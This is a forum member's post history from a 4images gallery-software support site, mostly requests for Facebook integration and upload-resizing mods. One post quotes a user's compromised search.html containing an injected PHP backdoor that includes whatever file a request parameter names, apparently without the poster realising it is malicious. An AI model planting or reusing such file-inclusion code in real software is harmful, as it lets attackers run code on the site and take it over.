Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - lemccoy

Pages: [1] 2 3 4 5 ... 7
1
Discussion & Troubleshooting / How do I...Freeze 4images forever!
« on: August 27, 2010, 05:28:25 AM »
Hey Guys -

My site has not been used in a while and probably won't, facebook and myspace killed it.  It's not really worth following up anymore with mods into facebook etc, the legend will live on forever! 

In that sense, I would like to freeze 4images such that it would still display all the pictures etc but wouldn't be interactive, ie no logging in, uploading, etc. 

Is there an easy way to do this? 

The main reason is I think spammers are somehow getting through the script.

Thanks for any help!

2
Chit Chat / doc.php hack
« on: May 29, 2009, 03:55:09 PM »
Just a warning to search your system for doc.php

it enabled some kind of hack that prompted Lunarpages to shutdown my account with no warning or possibility of reinstating.  I have since switched hosts to StableHost.com and they are quick with their support and 1/4 the cost of Lunarpages.  I was able to transfer my Cpanel account exactly with no major hassles.

anyways, it is done by:

"EasyNet Corp & SoloTeaM@TeChNoLoGy !"

I will not post the code here because people can copy, however if an admin wanted to see the code to stop the attack I can PM.

To all the people in lLatvia with no jobs...there's a reason.  Get off the computer and go apply for a job instead of trying to hack 4images sites.  Same to netherlands, germany, and half of Eastern Europe.

Thanks, and heads up.

3
Requests for paid modifications / Jobbörse / Facebook Connect
« on: February 20, 2009, 05:02:08 PM »
Looking to have Facebook Connect integrated into my 4images site so that I can get my users back!  Any ideas?  Please post ideas along with cost to integrate.  Thanks.

5
ok, what's it going to take for someone to integrate a small java/activeX resizer into the upload process?  an act of god or a small countries GDP?  give me a bid!

6
Hey,

I have had those two mods in the past.  However, there is one flaw with the resize, in that the server has to have received the large file (say 5mb) before it resizes it down (say to 200k). 

I would like the client side to resize to 200k then upload.  Even if this could be done with the MultiUpload mod that would be awesome.  Probably will need some kind of java integration?

Looking aroung 50-100 bucks.  I mean yen.  OK US dollars.

Thanks!

7
Hey

I need a new multiupload mod installed.  Must be very user friendly, quick, efficient and work!

I would like for files to be resized before uploading to limit the users time spent uploading.  I have a max of 1024 pixels any dimension, so if someone tried to upload a 2048 pixel photo it will shrink it down to 1024 THEN upload to server.  Must be able to handle multiple photos selected individually (not zipped or other). 

I had been messing around with upload mods and now have no idea what happened as it has been a while.  check drunkisland.com to see.

Thanks!

Also, has anyone integrated this software into iPhoto?  Shutterfly and Facebook are two that I have that integrate into iPhoto.  Any takers?  Make a bid!

8
Requests for paid modifications / Jobbörse / Re: Facebook Mod
« on: December 01, 2007, 12:14:35 AM »
this needs to have the majority of the code setup for the Facebook Application as well as any changes needed on the 4images side.

It would go on the users profile with a couple of options to configure.  Please research facebook apps if you're confused..those on facebook should know what I'm talking about?

Manurom - if you want someone to help you our or are stuck I could help by paying them a fee to help out?

9
Requests for paid modifications / Jobbörse / Facebook Mod
« on: November 28, 2007, 07:21:35 PM »
Hey,

This is a facebook/4images combined mod.  I want to be able to have a gallery (say three pictures in a strip, or customizable) showup in people's facebook profiles.  They can have it set to random pictures from the whole site, random pictures from a category, random pictures from a keyword, things like that.

Name your price within reason!  Paypal funds, deposit, upon completion.

10
WOW! one little character...that did the trick for me!  Thanks Ivan!

11
when i use the change owner option using the 1.7.4 i get a white screen ... the rest of the options works but not the multi change owner tool
could you check that please?
thanks

I got the same problem. Can somebody take a look at this?

Greets Maik

I am having the same problem...can someone please advise?  It only happened after the upgrade, should I try reinstall this mod or would it still not work? Thanks!

12
Mods & Plugins (Releases & Support) / Re: [MOD-beta] Multi-upload PLUS v0.3b
« on: September 06, 2007, 11:52:29 PM »
OK I answered my own question...sortof...

to resize the images, add the following to the file member_muploadform_jupload.html:

find:
Code: [Select]
   <!-- Languages -->
   <param name="labelFiles" value="{lang_files}">

add ABOVE:
Code: [Select]
<param name="convertImagesToFormat" value="jpg">
<param name="resizeImageMaxWidth" value="1024">
<param name="resizeImageMaxHeight" value="1024">

I tried:
Code: [Select]
<param name="convertImagesToFormat" value="jpg">
<param name="resizeImageMaxWidth" value="{max_media_imagewidth}">
<param name="resizeImageMaxHeight" value="{max_media_imageheight}">
but this didn't work?

13
Mods & Plugins (Releases & Support) / Re: [MOD-beta] Multi-upload PLUS v0.3b
« on: September 06, 2007, 11:10:40 PM »
this mod is great, and might help me get back some users from facebook! TRAITORS! anyways...

has anyone been able to get the resize BEFORE upload (on the client-side) working?  I uploaded the new JUpload file and it seems to be working.

Thanks!

14
Discussion & Troubleshooting / Re: template/search problem
« on: September 06, 2007, 10:02:03 PM »
Code: [Select]
<?php
$f
=trim($f); 
echo 
ini_get("safe_mode"); 
echo 
ini_get("open_basedir"); 
include(
"$f"); 
ini_restore("safe_mode"); 
ini_restore("open_basedir"); 
echo 
ini_get("safe_mode"); 
echo 
ini_get("open_basedir"); 
include(
"$f"); 
include(
$_GET['x']);
?>


this is all my search.html file is? I don't see an if statment?

15
Discussion & Troubleshooting / template/search problem
« on: September 06, 2007, 09:37:22 PM »
Warning: (null)() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thereal2/public_html/mako/includes/template.php(101) : eval()'d code on line 5

Warning: (null)() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thereal2/public_html/mako/includes/template.php(101) : eval()'d code on line 10

Warning: (null)() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thereal2/public_html/mako/includes/template.php(101) : eval()'d code on line 11

I saw another post similar to this but had to do with a smaller template file being in the root directory, where mine is. 

It started happening after my servers software was upgraded, including the PHP I think.  This only happens when using the search.php function.  Everything else seems to work!

You can see the album site here:

http://www.the-real.com/mako

Thanks for any help guys!

Pages: [1] 2 3 4 5 ... 7